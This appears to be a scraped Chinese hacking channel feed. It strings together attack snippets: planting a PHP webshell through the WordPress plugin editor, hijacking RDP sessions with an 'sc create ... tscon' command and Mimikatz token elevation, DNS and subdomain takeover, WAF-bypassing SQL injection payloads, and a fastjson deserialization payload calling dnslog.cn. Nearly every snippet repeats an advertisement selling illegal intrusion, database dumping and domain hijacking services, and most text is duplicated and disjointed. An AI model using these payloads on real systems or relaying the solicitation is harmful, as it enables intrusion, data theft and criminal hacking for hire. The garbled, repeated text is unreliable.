登陆wordpress的后台wp-admin
尝试上传phpwebshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的phpwebshell,点击更新文件,然后访问我们的phpwebshell
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
尝试上传phpwebshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的phpwebshell,点击更新文件,然后访问我们的phpwebshell
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
RDP会话劫持
如果攻击者在目标系统上获得本地管理员访问权限,则可能劫持其他用户的RDP会话。这也解决了攻击者对该用户的凭据需求。这项技术最初是由Alexander Korznikov发现的,在他的博客中已有描述。
可使用的可用会话列表可以在Windows任务管理器中的“Users“选项卡中查看。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
如果攻击者在目标系统上获得本地管理员访问权限,则可能劫持其他用户的RDP会话。这也解决了攻击者对该用户的凭据需求。这项技术最初是由Alexander Korznikov发现的,在他的博客中已有描述。
可使用的可用会话列表可以在Windows任务管理器中的“Users“选项卡中查看。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
也可以从命令提示符中获取相同的信息。
query user
创建一个使用系统级权限执行tscon的服务,将劫持ID为3的会话。
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#0" net start sesshijack
当服务启动时,用户“test”可以在不知道他密码的情况下使用netbiosX的会话。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
query user
创建一个使用系统级权限执行tscon的服务,将劫持ID为3的会话。
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#0" net start sesshijack
当服务启动时,用户“test”可以在不知道他密码的情况下使用netbiosX的会话。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
Mimikatz也支持这种技术。 第一步是检索终端服务会话列表。
ts::sessions尝试直接使用会话1将失败,因为Mimikatz并未以SYSTEM权限执行。因此,下列命令将会将token从本地管理员提升到SYSTEM。这样一来,当再次使用其他会话时,将不需要提供用户的密码。
ts::remote /id:1 privilege::debug token::elevate
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
ts::sessions尝试直接使用会话1将失败,因为Mimikatz并未以SYSTEM权限执行。因此,下列命令将会将token从本地管理员提升到SYSTEM。这样一来,当再次使用其他会话时,将不需要提供用户的密码。
ts::remote /id:1 privilege::debug token::elevate
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1
这种漏洞的影响不限于提供电商平台的云服务公司,它对整个云服务产业都有威胁。随着云服务的普及,互联网上存在许多指向大型云服务供应商(如亚马逊和微软)的CNAME记录。在特定情况下,这些CNAME记录的子域很容易被劫持。
我们以亚马逊的CloudFront云服务为例。CloudFront是个内容分发网络服务(CDN),以“分发”为基本的信息存储单元。 简单来说,每个分发都可以被看做在亚马逊Cloudfront服务器上托管的一组静态文件。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
我们以亚马逊的CloudFront云服务为例。CloudFront是个内容分发网络服务(CDN),以“分发”为基本的信息存储单元。 简单来说,每个分发都可以被看做在亚马逊Cloudfront服务器上托管的一组静态文件。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
服务器的域名存在漏洞,我们如果能找到这样的域名,并控制该域名,那么,对于那些经过该域名所在的解析服务器解析的域名,我们都可以很容易的进行各种攻击。为了找到这样的域名,我可能不得不返回去扫描互联网,幸运的是,因为我们已经有了一个“.int”域名区域的复本(在前一篇研究文章中,我们已经得到了),我们可以从这开始。在遍历了这个列表后,我发现了另一个有漏洞的“.int”域名:iom.int。实际上,这个网站的功能是齐全的,并且能正常工作,只是它的四个解析服务器中,有两个解析服务器的域名是过期的。非常有趣,除非你遍历了整个DNS树,否则你可能无法发现这个问题。例如,下面是iom.int域名的NS记录查询结果:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1
通常,一个域名如果没有被注册,是不会被解析的,但是,“.org.ph”顶级域名存在一个A记录,它被解析了,并将该顶级域名将访问域名的用户,引导到一个充满了可疑广告的页面中,包含一个通知信息:“这个域名可以被注册”。这可能是想从访问该域名(不存在的域名)的人那里赚更多的钱。我不想评论这个策略的道德性或模糊性,只想告诉大家,如何才能用dig探测到这种情况。下面的查询显示了DNS到底是怎么配置的:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍2
一旦我认识到iom.org.ph域名确实可用时,我可以注册这个域名,并将这个域名变成iom.int域名的权威解析服务器。这和我们上一篇文章中maris.int域名很相似,并且有一个有趣的问题。当一个人试图访问iom.int域名时,最终通过我们的解析服务器来查询的可能性是百分之50(根据前面“dig iom.int +trace”的结果,读者可以想想为什么是50%)。出现这个结果是因为DNS的轮询调度机制,这是一种利用多个服务器来分散DNS查询负载的技术。这个概念是相当简单的,在DNS系统中,如果你想利用多个服务器来分散DNS的查询负载,对于一个查询,就可能会得到多个结果(这个结果不是最后的IP,而是中间过程中查询到了解析服务器的结果,解析服务器会有多个)。因此,为了均匀的分配负载,你得到的返回结果将会是随机的,这样的话,查询客户端第次查询都会选择一个不同的解析服务器(NS记录)。在这个例子中,当我们查询DNS的A记录时,根据这个机制,有可能在三个IP中随机的返回一个,每个IP的可能性大约是33.33%。举个例子,假设我们要尝试向“.int”顶级域名的解析服务器查询iom.int域名的NS记录(解析服务器)。首先,我们通过下面的步骤得到“.int”顶级域名和解析服务器:
❤1
我们可以指定扫描的频道范围,并打印出解码后的Enhanced-Shockburst数据包。脚本的可用参数如下所示:
扫描频道范围1-5的设备:
在所有频道中扫描地址开头为0xA9的设备:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
扫描频道范围1-5的设备:
在所有频道中扫描地址开头为0xA9的设备:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1
常见关键配置用于限定可见性、入口与任务行为。intent-filter 用于匹配可接收的意图类型并决定是否成为入口(包含 MAIN/LAUNCHER 的 activity 即为启动项);exported 明确组件是否对外可访问(Android 12 起必须显式指定);readPermission/writePermission 与 provider 的 authorities、grantUriPermissions 共同约束数据访问;launchMode 与 taskAffinity 控制任务栈与实例化策略;process 指定组件运行进程以实现隔离;debuggable 与 allowBackup 影响调试面与数据备份面暴露面。
查了一下似乎没有测试页面,让 AI 帮忙写了一个脚本,手动跳转到指定的activity,看看能否触发一些请求,再测测有无漏洞。
查了一下似乎没有测试页面,让 AI 帮忙写了一个脚本,手动跳转到指定的activity,看看能否触发一些请求,再测测有无漏洞。
👍1🥰1
通过不断对order by字符串内容进行增删改,以及 Unicode 编码等操作后,测试效果参考如下:
{"shareType":"4 orderby 1 -- "} - 不拦截,查询失败
{"shareType":"4 order/**/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*123*/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*"*/by 1 -- "} - 不拦截,查询成功
通过order by获取列数后,开始获取数据库类型及当前数据库。判断数据库类型可以通过不同的查询语法进行判断,当数据查询失败时,可以大致判定当前数据库不支持该语法。不同数据库部分判断依据可参考如下:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
{"shareType":"4 orderby 1 -- "} - 不拦截,查询失败
{"shareType":"4 order/**/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*123*/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*"*/by 1 -- "} - 不拦截,查询成功
通过order by获取列数后,开始获取数据库类型及当前数据库。判断数据库类型可以通过不同的查询语法进行判断,当数据查询失败时,可以大致判定当前数据库不支持该语法。不同数据库部分判断依据可参考如下:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
fastjson反序列化
查看pom.xml文件发现fastjson版本1.2.55,该版本存在漏洞,利用DNSlog进行验证。
fastjson涉及反序列化的方法有两种,JSON.parseObject()和JSON.parse(),在代码中直接搜索parseObject。
查看pom.xml文件发现fastjson版本1.2.55,该版本存在漏洞,利用DNSlog进行验证。
fastjson涉及反序列化的方法有两种,JSON.parseObject()和JSON.parse(),在代码中直接搜索parseObject。
❤1
对该方法进行回溯,随机选取一个判断传进去的参数是否可控。通过上面的SQL注入分析已经知道getUserList方法中的search是直接从前端传进来的,参数可控。直接构造Payload:{"@type":"java.net.Inet4Address","val":"2czklw.dnslog.cn"}
然后在进行URL编码。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
然后在进行URL编码。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍1